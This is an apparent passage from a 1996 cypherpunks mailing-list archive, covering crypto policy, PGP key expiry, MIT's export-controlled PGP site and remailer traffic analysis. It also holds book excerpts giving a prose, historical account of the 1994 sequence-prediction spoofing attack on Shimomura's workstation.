Subject: Re: NSA says strong crypto to China?
In-Reply-To: <199601071553.KAA18768@pipe3.nyc.pipeline.com>
Message-ID: <199601072123.PAA00769@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Logically, it seems the best thing for the NSA to do (given the political
> character of the group) is to send strong-but-not-that-strong crypto out. 

I know I'm out of step with most of you on this point, and it could very
well be that I'm incredibly naive.  But I don't necessarily look at the
NSA as an enemy.  Right now we're on opposite sides of an important issue,
and I think they're doing a lot of damage.  But I tend to think that they
believe what they're doing is in the national interest.  They're trying 
to defend democracy -- our democracy, at least.

Right now we're in a position to impose the first ammendment on the entire
world.  Not through a political process or a military attack, but rather
with anarchy.  (Anarchy as Tim has described it.)

That's what this list is all about:  we're trying to impose certain civil
liberties on the world using a strategy that's based on anarchy theory. 
That theory tells us that if we can distribute tools and establish
standards we'll secure privacy and free speech rights regardless of what
governments do.  That's a very startling idea, and I believe it's sound. 
I believe that it's possible to impose the first ammendment on the entire
world by distributing crypto software.

So the question we ought to be putting to the NSA is this:  isn't it in
the best interest of the United States and the other capitalist Western
democracies to impose the first ammendment on the rest of the world? 

I don't see how anyone could argue that it isn't.

Look at who our adversaries are in the world today.  North Korea, Iraq,
etc.  Would any of those regiemes be able to survive if their citizens
were able to safely critique their governments publicly?  Is there any
country in the world we can't get along with that allows ideas to flow
freely? 

What are we giving up if we do this?  Does anyone believe that strong 
crypto is beyond the reach of anyone who really wants or needs it?  Will 
terrorists not have access to secure communications because our 
government won't let Netscape sell them an ssl web server?  It's an 
absurd argument.

I don't think the NSA is out to suppress our liberties.  They're trying to
protect the nation.  Their problem is that they're operating under an old,
obsolete paradigm.  They're fighting for something that's simply not
achievable:  crypto is out of the box, and no one's going to put it back. 
Once you accept that fact -- and it is a fact -- you have to start
formulating tactics based on reality as it exists now.

Right now the NSA is trying to push us into sacrificing our liberty and
privacy to an unwinnable cause.  If they succeed (and I don't think they
will), they will have done something terribly destructive in this country
and we will have missed an extraorinary opportunity to effect substantive
political change in the world at large.  They are wrong and they are
dangerous.  But it is a mistake to think of them as evil, as people who 
will tell any lie to get what they want.

I don't expect the NSA to adopt the cypherpunk world view.  But it's too
bad, because they'd do an awful lot of good all over the world if they
did.  Totalitarianism depends upon censorship and control over the mass
media.  If the NSA turned on a dime today, they could eliminate the 
possibility of totalitarianism within the year.  Cypherpunks write code 
-- think of what the NSA could do.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 8 Jan 1996 04:58:18 +0800
To: cypherpunks@toad.com
Subject: Toad Hop
Message-ID: <199601072043.PAA14996@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Before it is publicized, KM describes for Littman the
   Christmas 1994 attack on Shimomura's systems as a "TCP/IP
   prediction packet attack." (. . .) below are by Littman.]


   Three days later, on January 23, Shimomura will describe
   the attack in a widely distributed public Internet post. IP
   source address spoofing and TCP/IP sequence number
   prediction are the technical terms Shimomura uses to
   describe it, much like Mitnick's description. But his
   analysis is extremely technical, and even some UNIX
   security experts find it tough going.

   That same day, about 2 P.M., CERT will blast out an
   advisory to its international mailing list of 12,000
   Internet sites in the United States, Germany, Australia,
   the United Kingdom, Japan, and other countries. The vaguely
   worded report is much less specific than Mitnick's
   one-minute explanation on the telephone. Most likely, CERT
   is trying to provide enough detail so Internet sites can
   protect themselves against future attacks without providing
   so much detail that it could encourage copycat attacks.

   On one level, the hack is simple, a clever strike at a
   basic weakness of the Internet. Computers on the Internet
   are often programmed to trust other computers. The Internet
   was created to share information, and the attack on
   Shimomura, just like the Robert Morris Internet Worm attack
   seven years before, exploits that trust.

   The Internet has its own way of sending e-mail or files.
   Messages or files are split into smaller digital chunks or
   packets, each with its own envelope and address. When each
   message is sent, it's like a flock of birds that migrates
   to a planned location and reunites as a flock at the
   destination. Computers on the Internet often act like great
   flocks of birds that trust one another too. And all it
   takes is one enemy bird to infiltrate the flock.

                               . . .

   On Christmas Day 1994 the attack begins.

   First, the intruder breaks into a California Internet site
   that bears the cryptic name toad.com. Working from this
   machine, the intruder issues seven commands to see who's
   logged on to Shimomura's workstation, and if he's sharing
   files with other machines. Finger is one of the common UNIX
   commands the intruder uses to probe Shimomura's machine. As
   a security professional Shimomura should have disabled the
   feature. Finger is so commonly used by hackers to begin
   attacks that 75 percent of Internet sites, or about 15
   million of the more than 20 million Internet users, block
   its function to increase security.

   The intruder's making judgment calls on the fly about which
   commands will help him uncover which machines Shimomura's
   workstation might trust. He works fast. In six minutes he
   deduces the pattern of trust between Shimomura's UNIX
   workstation and an unknown Internet server.

   Then the automatic spoofing attack begins. It will all be
   over in sixteen seconds. The prediction packet attack
   program fires off a flurry of packets to busy out the
   trusted Internet server so it can't respond. Next, the
   program sends twenty more packets to Shimomura's UNIX
   workstation.

   The program is looking for a pattern in the initial
   sequence numbers -- the numbers used to acknowledge receipt
   of data during communications. The program deciphers the
   returned packets by subtracting each sequence number from
   the previous one. It notes that each new initial sequence
   number has grown by exactly 128,000. The program has
   unlocked the sequence number key.

   Shimomura's machine has to be idle for the attack to
   succeed. New Internet connections would change the initial
   sequence number and make it more difficult to predict the
   key. That's why the hacker attacks on Christmas Day.

   The attack program sends packets that appear to be coming
   from the trusted machine. The packet's return or source
   address is the trusted machine's Internet address.
   Shimomura's workstation sends a packet back to the trusted
   machine with its initial sequence number. But flooded by
   the earlier flurry of packets, the trusted server is still
   trying to handle the earlier traffic. It's tangled up.

   Taking advantage of the gagged server, the attacking
   program sends a fake acknowledgment. It looks real because
   it's got the source address of the trusted server, and the
   correct initial sequence number. Shimomura's workstation is
   duped. It believes it's communicating with a trusted
   server.

   Now the attacking program tells Shimomura's obedient
   workstation to trust everyone. It issues the simple UNIX
   "Echo" command to instruct Shimomura's workstation to trust
   the entire Internet. At that point, Shimomura's personal
   and government files are open game to the world. It's more
   than a humiliating blow to the security expert. By making
   Shimomura's machine accessible from any Internet site, the
   intruder has masked his own location. He can return from
   anywhere.

   The hacker can't believe his good luck. The attack is only
   successful because Shimomura has not disabled the "R"
   commands, three basic commands that allow users to remotely
   log-in or execute programs without a password. Tens of
   thousands of security-conscious Internet sites,
   representing well over a million users, routinely block
   access to the R commands to avoid its well publicized abuse
   by hackers.

   It takes a few keystrokes and about thirty seconds to shut
   off the R commands on an Internet server. You don't even
   have to turn off the machine.

   Why didn't Shimomura do it?

                               . . .

   Mitnick laughs. "He's [Shimomura's] not happy. I have
   nothing to do with it. I'm just telling you what I hear
   through the grapevine."

   [Littman] "Who do you think might have done it?" I ask 
   the likely suspect. "How did he figure it out himself?"

   "He [Shimomura] realized that somebody had edited his
   wrapper log, which shows incoming connections. Somebody
   actually modified those logs, and then he was able to
   reconstruct what happened through these logs that were
   mailed to another site unbeknownst to the intruder."

   Mitnick's actually telling me the evidence Shimomura
   collected to figure out the attack. The wrapper is supposed
   to control connections to Shimomura's server and log all
   connection attempts. It failed to protect Shimomura but
   still it logged the hacker's spoofed connection, and a copy
   of the log was e-mailed off-site.

   "So you were asking me if there's a secure e-mail site?"
   Mitnick continues, his voice suddenly hard. "My answer is
   no. This guy in my estimation is the brightest in security
   on the whole Internet. He blows people like Neil Clift
   away. I have a lot of respect for this guy. 'Cuz I know a
   lot about him. He doesn't know anything about me,
   hopefully, but he's good.

   "On the Internet, he's one of the best in the world."

   [pp. 222-25]

   -----

   [KM] "I don't know what his motive is. I don't know
   the man at all. Alls I know is he's very technical and he's
   very good at what he does. He's in the top five."

   [JL] "What makes Shimomura so good?"

   [M] "When someone penetrates his system he knows what to
   look for. When you compile a program, it uses external
   files and libraries. This is the type of guy that would
   look at the access times of the files to try to figure out
   what type of program somebody was compiling. The guy's
   sharp."

   On UNIX systems it's possible to tell the last time a file
   was read. Mitnick's guessing that Shimomura could determine
   the type of application that was compiled (converted into
   the computer's most basic machine language) by examining
   the date stamps in certain system directories. He's also
   acknowledging he knows that the intruder compiled a program
   while he was on Shimomura's machine.

   Once again, Kevin Mitnick seems to have an amazing amount
   of detail on how Shimomura analyzes an attack.

   [M] "He's just very good at -- well, he's a spook. What do
   you expect? This is only what I hear in the grapevine." ...

   [L] "But does the grapevine say he's primarily a spook?"

   [M] "Unknown. He's good in security and he consults with
   companies like Trusted Information Systems, the people that
   develop Internet fire walls, and a lot of people in D.C.
   and the Virginia area."

   Trusted Information -- the name strikes a bell. Markoff
   quoted someone from Trusted Information in his front-page
   "Data Threat" article.

   [L] "Where is Trusted Information?"

   [M] "Oh, in Maryland, 301 area code. Baltimore, I believe."

   [L] "What are some of the Virginia companies Shimomura
   works with?"

   [M] "I just have the phone numbers," Mitnick reveals
   casually. "I haven't called them yet to see."

   [pp. 252-53]

   -----


   Why not ask John Markoff about the real reason he called me
   twice this morning?

   So I ask him about the Shimomura Newsweek story, and the
   odd reference to cellular phones. He comes back with a
   stunning revelation.

   "Somebody hit a different Tsutomu machine last summer and
   the NSA was pissed," Markoff tells me. "They freaked out.
   There's no question about it."

   Why didn't he mention this in his New York Times stories?
   Why create the false appearance Shimomura was first hacked
   Christmas Day?

   "But it was a different machine?" I ask.

   "Am I being interviewed here?"

   It strikes me as an odd question. Markoff was the one who
   called me twice in the space of an hour. Who's interviewing
   whom?

   "Let's get on the same wavelength," Markoff suggests. "I'm
   glad to share this stuff with you, but I want to know where
   it's going to show up. 'Cuz I'm pretty close to Shimo and
   it's an issue for me."

   Before I can respond, he starts talking about Shimomura
   again.

   "I wrote that profile of Tsutomu because after I mentioned
   him in the bottom of my story ["Data Threat"] I basically
   outed him and a million reporters were all over him."

   "He wasn't happy about that?"

   "No, Tsutomu loves it," Markoff says. "He's playing his own
   games.

   "I'II tell you it's unclear what was taken [referring to
   the Christmas hack], and point two, I can send you a public
   posting by an Air Force information warfare guy who
   described what was taken and their assessment of the
   damage.

   "And there are lots of little snips of code that a
   brilliant hacker could probably use. But Tsutomu's mind
   works in very cryptic ways. It's not clear that without
   Tsutomu you're going to be able to do anything with it.

   "Now in this break-in I don't actually think a lot of stuff
   was taken."

   This break-in? Just how many times was Shimomura hacked
   before Christmas?

   But I ask a different question. "Why would an Air Force guy
   post something?"

   "Oh, Tsutomu," Markoff casually replies. "He produced a lot
   of software for the Air Force."

   "Where would he post this?"

   "Oh, to a mailing list. A lot of people were concerned
   about what was taken from his [Shimomura's] machine. What
   they [the hacker] got was a lot of his electronic mail.
   Some of it's kind of embarrassing. [But] I don't think
   people are going to find new ways to attack the network
   based on this particular attack.

   "There is another issue," Markoff cautions in a serious
   tone.

   "Tsutomu is a very sharp guy, and it is not impossible that
   that was a bait machine, which is why I stayed away from
   the issue."

   Is Markoff implying Shimomura, a rumored NSA spy, laid a
   trap? And what about Markoff's New York Times articles?
   Were they part of the trap, too?

   "Think about it for a second," Markoff pauses dramatically.
   "And you get into this wilderness-of-mirrors kind of world.
   And a lot of people that are writing don't know everything,
   and I don't know everything.

   "I've been protecting him [Shimomura] for five years. I get
   the profile and the [Wall Street] Journal is on him. They
   don't know how close he is to the military. It would make
   perfect sense. Who knows what's on the code? The guy is in
   the counterintelligence business."

   [pp. 258-60]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jc123@arn.net
Date: Mon, 8 Jan 1996 06:14:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601072156.PAA28141@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Could you send me some information about crypto stuff.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 8 Jan 1996 05:54:51 +0800
To: Adam Shostack <cypherpunks@toad.com>
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601072144.QAA06839@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@lighthouse.homeport.org> wrote:

I wrote:

> | PGP should give a warning when the key passes the expiration date. It
> | should not prevent you from using it, but should remind you that the
> | key is rather old, and that the owner may have moved, etc.
[..]

> 	Expire should mean expire, i.e., no longer valid, useful or
> useable.  If you want to have a 'depreciated after' and an expire
> date, that might be useful, but it seems more like feeping creaturitis
> to me.  It adds bulk to every key, when a better solution would be to
> have keys automatically deprecitated some time before they are due to
> expire.

The reason I think a warning option is good (really, 1 bit bit flag 
for warn rather than kill... that's "bulk" to every key?) is so that 
if for whatever reason the key is used (say I am unable to get a 
newer key for you but really need to send you a private message) I 
have something to use... and you, if you choose to hold onto old 
keys, can decrypt it.  If not, the sender was warned.


> 	Also, the ability to extend the life of a key is fraught with
> danger.  The longer a key is around, the more likely it is to become
> comprimised.  The user might not be aware that the key is comprimised.
> Better to have an unchangeable date.  (On a more technical level,
> allowing users to change the expiry date on a key means that the key's
> expiry date is not signed by the signatories, and an opponent who
> comprimised a key could simply change the expiry date on that key and
> send it to the servers, so that it would continue to be used, and your
> opponent could continue to read all your communications.)
> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 
> 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Keith Barrow <jbarrow@inf.net>
Date: Mon, 8 Jan 1996 06:57:12 +0800
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BADD1E.0E5DDDE0@ppp5.inf.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My internet service provider does not carry alt.sex at all is there anyway that i can still get into these newsgroups? Sorry if this question is a little elementary to some of you, but i have to learn somewhere.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMO/2Ax34sJAQcsCpAQFUugP/TThD+3F5ifba118ktl5NhHzzmiMTRxoG
8D///RbTgna0OvPhNpgz5MrHGewGhyHfDtbedI0MieHiGEj+az7xSp2qIgOlMKKm
i7mz9IFIxBzjLqV/n27gYuW12yb6eeEau9GkkvYeF7gq49AocenYUw1BrlFn58zJ
BfFxTRPsGjI=
=Dyre
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 8 Jan 1996 06:27:59 +0800
To: cypherpunks@toad.com
Subject: Re: "Re: NSA says strong crypto to china??
Message-ID: <ad15a9b3040210046fb5@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 PM 01/07/96, Timothy C. May wrote:
>As when the Cossacks who fled the U.S.S.R. after the war and pledged to
>help the West fight Communism were returned by the British to Stalin, where
>they were executed. (I was reminded of this by the latest Bond movie, where
>Bond avers, "Not exactly Britain's finest moment.")

The Kurds in Iraw during the Persina Gulf war is an analagous situation.
The Kurds supported and assisted the U.S. government during the war.
Really pro-U.S..
At some point near the end of the war, though, the U.S. just started
ignoring them, and Hussein
started bombing them and killing huge numbers of them.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 8 Jan 1996 06:11:37 +0800
To: WlkngOwl@unix.asb.com (Deranged Mutant)
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <199601072144.QAA06839@UNiX.asb.com>
Message-ID: <199601072153.QAA11487@homeport.org>
MIME-Version: 1.0
Content-Type: text


I was thinking of two dates, an expire and a warn.  Admittedly, adding
a few bytes to a key is not a big deal, but neither is the gain from a
warn and expire date.  If you want to be able to set a bit for 'use
after expire,' I would see that as a reasonable thing.

Adam

Deranged Mutant wrote:

| Adam Shostack <adam@lighthouse.homeport.org> wrote:
| 
| DM wrote:
| 
| > | PGP should give a warning when the key passes the expiration date. It
| > | should not prevent you from using it, but should remind you that the
| > | key is rather old, and that the owner may have moved, etc.
| [..]
| > 	Expire should mean expire, i.e., no longer valid, useful or
| > useable.  If you want to have a 'depreciated after' and an expire
| > date, that might be useful, but it seems more like feeping creaturitis
| > to me.  It adds bulk to every key, when a better solution would be to
| > have keys automatically deprecitated some time before they are due to
| > expire.
| 
| The reason I think a warning option is good (really, 1 bit bit flag 
| for warn rather than kill... that's "bulk" to every key?) is so that 
| if for whatever reason the key is used (say I am unable to get a 
| newer key for you but really need to send you a private message) I 
| have something to use... and you, if you choose to hold onto old 
| keys, can decrypt it.  If not, the sender was warned.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Mon, 8 Jan 1996 06:35:27 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Why can't I get PGP from MIT
Message-ID: <ad15ef7a00021004f806@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>I believe I had a problem when I wanted to get PGP coming from
>internexus.net (New Jersey). I just e-mailed them about it and I think
>they just added the site to their 'acceptable' list. I did a traceroute
>to why.net and noticed that it is very close to me, coming off of
>SprintNet... probably the same situation.

Internexus.net has been added to the list. The heuristic that the MIT site
enforces is as follows:

o To get access you must properly answer some questions regarding export control
  law and licensing.

o Your host must have an "inverse" DNS mapping so we can learn its name.

o Your host's name must end in either ".EDU", ".COM", ".MIL", ".GOV", ".US",
  or ".CA".

  *or*

  Be on our exception list.

All the ".NET's" and ".ORG's" need to be "excepted."

Maintaining the exception list has turned out to be a serious problem. I
receive roughly 20 messages a day from people needed to be added. To make
matters worse the exception list has to be maintained in two different
locations in two different formats. I just broke down today and automated
the management of the lists.

Unfortunately the only thing I can do for people whose machines do not have
an inverse DNS mapping is to send them personal copies via e-mail. However,
I have been too swamped to do this.

I am looking into alternative approaches of guarding the FTP site (possibly
doing a traceroute or something similar) in a better way that still meets
the requirements of maintaining export restrictions.

Please remember that I maintain the MIT FTP site in my all too rare spare time.

Thank you.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPBCFcUtR20Nv5BtAQEUhAQAnzPlxiXo33DqX0X1m39Xh1I0e7ND332n
L4vZlf7T3VDU0jYv1IB/6D3aNvMXo0l8JpsXIxqzaxP5nYgVgm1idx06IgY7T1rJ
vVRCIqfFleUFPTS/ndo7jznzr+w7Dq1+5wRU2Oa+ymRICBNHCeEnaxcmx3zs4R6a
VEBmc/6w8TQ=
=vFSt
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 8 Jan 1996 06:23:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <ad154b940f02100416a1@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.960107165652.10716A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Tim, 
 
 
On 01 07 96 you say: 
 
 ...the crypto anarchy notions we talk about makes collection 
 of taxes increasingly problematic. 
 
 
You also say: 
 
 Today, and especially with strong crypto and all the develop- 
 ing methods we talk about, how will the Ruler know what to 
 tax? 
 
 
You conclude: 
 
 ...I believe that this issue [collection of taxes] is one of the 
 motivations to restrict the use of strong crypto and to make 
 transactions monitorable. 
 
 
In 02 96 Internet World, science fiction writer Vernor Vinge 
is interviewed: 
 
 Suddenly [about 1984] people realized that if a 100 million 
 people each had computers that were one-tenth of one percent 
 as smart as the government's computers, they had much less to 
 fear about government. 
 
 Now we've entered an era where the government understands this. 
 One the one hand, police forces are legitimately [?] frightened; 
 law enforcement could become much more difficult.  But at the 
 same time --with some new laws and technology-- police powers 
 could be much greater than before....  You've heard of ubiquitous 
 computing, but how about UBIQUITOUS LAW ENFORCEMENT? 
 
 
Developing that line of thought, Vinge says: 
 
 ...the old Clipper chip proposal recommended that GOVERNMENT 
 LOGIC be present in certain communications equipment. 
 
 For the future I think this aspect of Clipper was as significant 
 as the crypto issues.  What would it be like if a certain amount 
 of GOVERNMENT LOGIC were mandated in the design of every host 
 in a country? 
 
 
And Vinge concludes: 
 
            WE COULD HAVE REAL-TIME TAXATION. 
 
and 
 
      ...very fine-grain CONTROL would be possible. 
 
 
Capitalization in the above excerpts is mine. 
 
The whole interview is worth reading.  Its title is: Reality & 
Fiction.  It starts at page 82.  Jeff Ubois asked the questions. 
 
 
Every HOST in a country?  As Larry Ellison says in 12 26 95 / 
01 02 96 Computerworld 41: 
 
 The ideal operating system arrives across a network when you 
 turn your computer on. 
 
 
The GOVERNMENT LOGIC arrives too... 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 8 Jan 1996 07:57:03 +0800
To: cypherpunks@toad.com
Subject: RE: "trust management" vs. "certified identity"
Message-ID: <2.2.32.19960107233946.00902734@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 1/7/96 -0800, Timothy C. May wrote:

>Frankly, the notion that a central government would issue proofs of
>trustability, via identity cards and the like, is a modern invention.
>
>(The message of Vinge's "True Names" was partly ironic, that one's True
>Name is important primarily in allowing tagging by the government. Ordinary
>people rarely need True Names. 
>
>I don't want official proof of my identity. If others want it, let them
>make their own arrangements.

In the early 1950's Robert Heinlein and his wife Virginia took a trip around
the world ("Tramp Royale" recently published by Ace Books).  He had to apply
for a Passport and got a Certificate of Delayed Birth Registration from
Missouri since his county had not kept birth records when he was born.

"I breathed a sigh of relief; at last I was me.  I had attended school
[Annapolis BTW], been commissioned in the armed services, held two civil
service jobs, married, voted run for office, drawn a pension and done all
manner of things as a flesh-and-blood being through more than four decades,
all without having had any legal existence whatsoever."

Proof of identity is never needed.  Proof of authorization is only needed by
one's bankers.  The rest is government garbage.  Hopefully enough people
will learn this and we can reduce the nonsense a bit.

DCF

"Where are your papers?  

Sorry buddy, I'm a fundamentalist.  I don't go in for that Mark of the Beast
stuff.  Have you ever read Revelations?  You aren't one of those tools of
Satan are you?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 8 Jan 1996 07:59:42 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Mixmaster On A $20 Floppy?
In-Reply-To: <ad15159e03021004e3e7@[137.110.24.250]>
Message-ID: <199601072345.SAA28014@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I wrote:
# I suppose that a site that escapes detection as a Mixmaster will throw off
# the correlation stats (i.e. because a message from that site to B won't be
# identified as a remailed message). But such sites are elusive objects I
# think. On the one hand, the site can't endure for long, or else its
# throughput traffic will likely give it away as an anonymizer (i.e. it gets
# lots of mail from the Mix network, and sends out similar amounts of mail to
# all sorts of people and the network). On the other hand, it had better last,
# or else it will look suspicious as a transient account receiving mail from
# the Mix network, sending a few messages, and quickly vanishing.

Lance writes:
> The second paragraph seems to deal with the issue of being known as an
> anonymous remailer or regular remailer user. I am not sure exactly what the
> concern with that is.

I was trying to explore possible ways to beat TA with less bandwidth, in the
context of transient (w.r.t. network address) anonymizers. I indicated doubt
about the possibility of any real gain, and as I think about it more I'm
not able to convince myself that there's any real value at all in that 
regard.

Futplex <futplex@pseudonym.com>		- "IBM ?"
Go Colts !				- "All the girls are doing it"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPBbEynaAKQPVHDZAQGm7wf+LbaZeZqI8/qwBQi+6vS4bzvtSkdf9i1v
aD8I0jlNLAmFsPQ6dJ0mOBObPz8b+3PbJ1/TCyr5w0vWcb6XpEemblqNf1H+SdY+
nP6Xbmdoyie2cObGjYOz8HHvhg+qANnanIqtax/CPd9smPMcLnl20pyLJPhlFRPG
MUQX33yIrxXEGY0os725Q1lQDWHaMpbt65+quzVZYFAfaNzBzQ99vy4ZrzsBPZIK
GLiqPcygWt3Kxfk7O0WjI2Gic3nrrpP1X5SxWwFnGQmlm9Zd9FwJxhpLsW4s+0B0
CNAI8c1ASA9AebLVVYVP4riQRkVDK/BYYSJLcXQfp2TzDSgPXg32JQ==
=coNU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 8 Jan 1996 08:14:18 +0800
To: cypherpunks@toad.com
Subject: Re: "Microsoft.com" added to my KILL file
Message-ID: <199601072354.SAA21227@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Poor me has to run a mailing list where the *majority* of 
subscribers are using MS Mail or Exchange.

For a partial list of MS Mail/Excahnge bugs relevant to list 
administrators, fetch my list info file. Send "info 
win95netbugs" to majordomo@lists.stanford.edu.

Fortunately, there's been no need to killfile msn.com 
recently. Microsoft incompetence took care of that at the 
source. See the January 2nd news article on 
http://www.zdnet.com/~pcweek/

- -rich


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPBdIyoZzwIn1bdtAQG1JAF/bcnxMqmR1YAtf3trsGC8o8RKqXUdufrT
H93ID8hJvr2bxXtdgqm2cmd5vVerRk5l
=gQTE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 8 Jan 1996 08:09:16 +0800
To: Jonathan Keith Barrow <cypherpunks@toad.com>
Subject: Re:
Message-ID: <2.2.32.19960107235519.0091931c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 1/7/96 -0600, Jonathan Keith Barrow wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>My internet service provider does not carry alt.sex at all is there anyway
that i can still get into these newsgroups? Sorry if this question is a
little elementary to some of you, but i have to learn somewhere.
>

Are you sure alt.sex.* is good for you?

Read the How to Receive Banned Newsgroups FAQ at:

http://www.ecnet.net/users/mumbv/pages/banned-groups-faq.html

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 8 Jan 1996 08:19:19 +0800
To: cypherpunks@toad.com
Subject: Re: Jan 13 Mountain View CA meeting
Message-ID: <199601072358.SAA21252@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Did you have any specific time in mind?

- -rich

mrm@netcom.com (Marianne Mueller) wrote:
>Hi all, happy new year. 
>
>The Jan 13 Mountain View, California meeting will be held again
>at Sun Microsystems, at Sparcy's cafeteria.   That's building 21, 
>in the set of Sun buildings near Shoreline Park in Mountain View. 
>Take 101 to Amphitheater Parkway exit, turn left onto Charleston 
>at the light (this street is also named Garcia at its far end)
>and follow the purple Sun signs for building 21.   You'll drive
>down Charleston (Garcia) for about 1/3 mile and then turn right
>onto a road that in about 3 blocks takes you to B21. 
>
>Please send mail if you have a topic you would like to speak about,
>and I'll send out a speaking agenda towards the end of the week. 
>
>Marianne
>mrm@netcom.com
>mrm@eng.sun.com 
>
>p.s. I'll bring bagels again but since I never got reimbursed 
>last time around I think I will put out the donation jar this
>time ...! 


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBEAwUBMPBeHCoZzwIn1bdtAQFR9wF4nonVEmlnlahBGjNOnEvKlFCWz9QXkTPB
vH/9uXyAZsWPwf01bqe4xWiBCvePqVI=
=pdTJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 8 Jan 1996 23:28:25 +0800
To: cypherpunks@toad.com
Subject: Re: NSA says strong crypto to China?
Message-ID: <199601081514.HAA03562@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 PM 1/7/96 -0800, Rich Graves wrote:
>The NSA is logically allied with other organizations of greater
>repressiveness, inasmuch as it is not really in the interest of the NSA to
>pursue absolute freedom anywhere. Certainly they have no desire for anyone
>in the world to enjoy privacy. However, this logical symmetry does not
>translate to practical collaboration. You think the NSA and the Chinese
>government trust each other at all? They're spying on each other.


They have common interests and conflicting interests.  They have a 
common interest in repressing Chinese dissidents, to keep the world
safe for National Security Agencies.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 8 Jan 1996 08:42:37 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft has a way to go on E-Mail
Message-ID: <199601080028.TAA21744@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Perry say:
>The problem is that microsoft has made the mistake of using
>their own software, which doesn't understand the distinction
>between envelope and header addresses. I've been on the phone
>with contacts there and I'm going to start threatening going
>to the press soon.

I'm sure they're scared. What press? NBC News? The Seattle Times? 
The Wall Street Journal? Windows Magazine? Maybe Michael Kinsley 
will run a hard-hitting expose.

About a dozen recognizable computer magazine reporters and editors 
are on the win95netbugs mailing list. For months, the majordomo 
welcome message has told subscribers the bugs they should come to 
